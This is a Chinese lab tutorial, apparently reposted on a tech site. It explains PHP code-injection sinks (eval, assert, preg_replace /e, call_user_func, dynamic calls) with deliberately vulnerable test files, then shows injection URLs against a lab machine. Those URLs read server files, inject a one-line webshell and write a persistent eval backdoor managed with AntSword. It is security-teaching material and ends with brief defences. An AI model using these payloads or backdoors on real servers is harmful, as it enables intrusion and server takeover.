IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 【PHP代码注入】PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例 -> 正文阅读

[网络协议]【PHP代码注入】PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例

1 PHP注入概述

RCE概念:remote command/code execute,远程命令/代码执行。

PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过http请求将代码注入到应用中执行。

PHP代码注入与SQL注入比较
其注入思想是类似的,均是构造语句绕过服务器的过滤去执行。
区别在于SQL注入是将语句注入到数据库中执行,而PHP代码执行则是可以将代码注入到应用中,最终由服务器运行它。

条件

  • 1)程序中含有可以执行PHP代码的函数或语言结构;
  • 2)传入该函数或语言结构的参数是客户端可以控制的(可以直接修改或造成影响),且应用程序过滤不严。

危害 :这样的漏洞如果没有特殊的过滤,相当于直接有一个WEB后门的存在。攻击者可以通过代码执行漏洞继承WEB用户权限、执行任意代码;如果服务器没有正确配置或者WEB用户权限比较高的话,还可以读写靶机服务器任意文件内容,甚至控制整个网站或者服务器

2 相关函数与语言结构

凡是出现以下代码,都需要谨慎处理其传入的参数,容易出现PHP注入漏洞。

2.1 eval()函数

作用:该函数的作用是将字符串作为PHP代码执行

危害:如果没有对该函数的参数进行有效准确过滤,其参数将有可能被用户用于注入有害代码。

例子

  • 在网站根目录下新建PHPi文件夹,并在该文件夹下新建txt文件,重命名为eval.php,该文件的测试代码如下,其中的全局变量$_GET还可以是$_REQUEST等其他预定义超全局变量。
<?php
if (isset($_GET['code'])){
	$code=$_GET['code'];
	eval($code);
}else{
	echo "Please submit code!<br >?code=phpinfo();";
}

在这里插入图片描述

  • 通过浏览器访问上述函数所在网页时,可以通过传递参数该code来执行PHP探针。主要方式有以下几种:
    ①普通方式提交变量:?code=phpinfo();
    ②以语句块方式提交变量:?code={phpinfo();}
    ③以多语句方式提交参数:?code=1;phpinfo();
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

2.2 assert()函数

作用:该函数的作用是将字符串作为PHP代码执行。如果它的条件返回错误,则终止程序执行。

危害:该函数也会将传入的字符串参数作为PHP代码执行。如果没有对该函数的参数进行有效准确过滤,其参数将有可能被用户用于注入有害代码。

例子

  • 在网站根目录下的PHPi文件夹下新建txt文件,重命名为assert.php,测试代码如下,其中的全局变量$_GET还可以是$_REQUEST等其他预定义超全局变量。
<?php
if (isset($_GET['code'])){
	$code=$_GET['code'];
	assert($code);
}else{
	echo "Please submit code!<br >?code=phpinfo();";
}
  • 通过浏览器访问上述函数所在网页时,可以通过传递参数该code来执行PHP探针。主要方式有以下几种:
    普通方式提交变量:?code=phpinfo()或者?code=phpinfo();
    与eval()函数有别的是,该函数不能执行传入语句块或多语句作为参数。
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

2.3 preg_replace()函数

作用:该函数用于对字符串进行正则处理。
函数原型及解析如下:搜索$subject中匹配$pattern的部分,以$replacement进行替换。特别地,当$pattern处第一个参数存在e修饰时,$replacement的值会被当成PHP代码来执行。

mixed preg_replace(mixed $pattern, mixed $replacement, mixed $subject [, int limit = -1 [, int &$count]])
#mixed表示函数的返回值可以为混合类型

例子

  • 在网站根目录下的PHPi文件夹下新建txt文件,重命名为preg_replace.php,测试代码如下。代码中第一个参数 "/\[(.*)\]/e"解析如下,第二个参数\\1表示的是正则表达式第一次匹配的内容。
    ① 在两个/间是要匹配的正则表达式;
    ②用两个\表示对中括号的转义,也就是说要匹配的内容是中括号内的。
    ③匹配的内容就是(.*)。其中点表示任意字符,*表示任意多个。
<?php
if (isset($_GET['code'])){		//其中的全局变量\$_GET还可以是\$_REQUEST等其他预定义超全局变量。
	$code=$_GET['code'];
	preg_replace("/\[(.*)\]/e",'\\1',$code);
}else{
	echo"?code=[phpinfo()]";
}
?>
  • 通过浏览器访问上述函数所在网页时,可以通过传递参数该code来执行PHP探针。主要方式有以下几种:
    ①普通方式提交变量:?code=[phpinfo();],[]是由于preg_replace的第一个参数有分号。
    ②以语句块方式提交变量:?code={[phpinfo();]}
    ③以多语句方式提交参数:?code=1;[phpinfo();]
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

2.4 call_user_func()函数

call_user_func()这一类函数具有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用开发者意料之外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。

call_user_func($fun,$para)函数:第一个参数作为回调函数,后面的参数为回调函数的参数。将$para这个参数传递给$fun这个函数去执行。

例子

  • 在网站根目录下的PHPi文件夹下新建txt文件,重命名为call_user_func.php。测试代码如下:
<?php
if(isset($_GET['fun'])){
$fun=$_GET['fun'];//assert
$para=$_GET['para'];//phpinfo()
call_user_func($fun,$para);//assert(phpinfo())
}else{
    echo"?fun=assert&amp;para=phpinfo()";
}
?>
#注意,fun不可以取eval,因为eval不是函数,而是语言结构
  • 通过浏览器访问上述函数所在网页时,可以通过传递参数该code来执行PHP探针?fun=assert&para=phpinfo()。值得注意的是,传入的第一个参数可以是assert函数而不是eval。
    在这里插入图片描述

2.5 动态函数$a($b)

背景:由于PHP的特性原因,PHP函数支持直接有拼接的方式调用,这就直接导致了PHP在安全上的控制又加大了难度。不少知名程序中也用到了动态函数的写法,这种写法跟使用call_user_func()函数的初衷一样,都是为了更加方便地调用函数,但是一旦过滤不严格就会造成代码执行漏洞。

例子

  • 在网站根目录下的PHPi文件夹下新建txt文件,重命名为dynfunc.php。测试代码如下:
<?php
if(isset($_GET['a'])){
	$a=$_GET['a'];
	$b=$_GET['b'];
	$a($b);
}else{
	echo"?a=assert&amp;b=phpinfo()";
}
?>
  • 通过浏览器访问上述函数所在网页时,可以通过传递参数该code来执行PHP探针,?a=assert&b=phpinfo()

在这里插入图片描述

3 PHP代码注入漏洞的利用实例

3.1 实验目的

(1)了解PHP漏洞的危害;
(2)掌握PHP漏洞的利用方法。

3.2 实验环境

靶机:win2008虚拟机,部署WAMP环境,虚拟机系统安装及WAMP部署方法参考文章《《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》。利用网站根目录下的PHPi文件夹下的assert.php文件,assert.php的代码详见上述2.2节。

真实机:win10系统,安装中国蚁剑软件。注意,靶机与真实机属于同一局域网。

3.3 实例内容

3.3.1 实例一:直接获取shell

(1)采用真实机访问assert.php,其中提交参数为?code=@eval($_REQUEST[1]);(构成一句话木马,密码为1)即网址为http://172.16.1.1/PHPi/assert.php?code=@eval($_REQUEST[1]);,建议配合中国蚁剑使用。

(2)运行中国蚁剑,在界面空白处点击右键,点击添加数据。
在这里插入图片描述
在这里插入图片描述
(3)填写参数如下,其中URL中要注意语句结尾应有分号。填写后点击提交。
在这里插入图片描述

(4)提交后可以看到页面多了一条内容,双击可以看到靶机的相关信息。
在这里插入图片描述
在这里插入图片描述

3.3.2 实例二:获取当前文件的绝对路径。

(1)采用真实机访问assert.php,其中提交参数为?code=print(__FILE__);即可获取当前网页的绝对路径,其他漏洞依次类推。__FILE__是PHP预定义常量,其含义为当前文件的路径
在这里插入图片描述

3.3.3 实例三:读文件

前提:(1)目标文件路径;(2)读取权限。
方法:利用file_get_contents()函数读取服务器文件。
例子:读取服务器的hosts文件,
真实机访问assert.php文件,其中传入参数?code=var_dump(file_get_contents('c:\windows\system32\drivers\etc\hosts'));,即可将目标文件内容显示在页面上。
在这里插入图片描述

3.3.4 实例四:写文件

前提:具备文件夹的写入权限。
方法:利用file_put_contents()函数写入服务器文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
例子
(1)采用真实机访问assert.php,其中传入参数为
?code=file_put_contents($_REQUEST[1],$_REQUEST[2]);&1=shell.php&2=<?php @eval($_REQUEST['ant']);?>。参数1值为shell.php,参数2值为<?php eval($_POST['ant']); ?>,表示在当前目录下创建文件shell.php(文件内容为参数2的值),并写入一个后门。
在这里插入图片描述

(2)采用真实机访问shell.php文件,网址为http://172.16.1.1/PHPi/shell.php.
在这里插入图片描述

(3)使用蚁剑访问刚刚写入的后门文件,按以下填写参数,并点击添加。
在这里插入图片描述
(4)提交后可以看到页面多了一条内容,双击可以看到靶机的相关信息,可管理靶机。
在这里插入图片描述
在这里插入图片描述

4 防御

(1)尽量不要使用eval()等函数,如需使用则一定要进行严格的过滤;
(2)preg_replace放弃使用/e修饰符;
(3)在php.ini文件中,将assert等函数禁用掉,如disable_functions = assert

5 总结

(1)掌握PHP语言种几种可能存在注入的函数;
(2)结合SQL注入与XSS漏洞思考PHP注入绕过手法。
(3)获取网站相关的信息利用PHP漏洞;获取数据库相关内容利用SQL注入漏洞。
(4)掌握漏洞验证及利用的过程。
(5)掌握利用漏洞读写文件及建立后门的过程。

tips:
Seacms-v6.26、v6.53、v6.54、v6.55(海洋cms)存在代码执行漏洞,cms是网站的模板。

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-06-29 19:26:03  更:2022-06-29 19:26:57 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年4日历 -2024/4/24 0:58:25-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码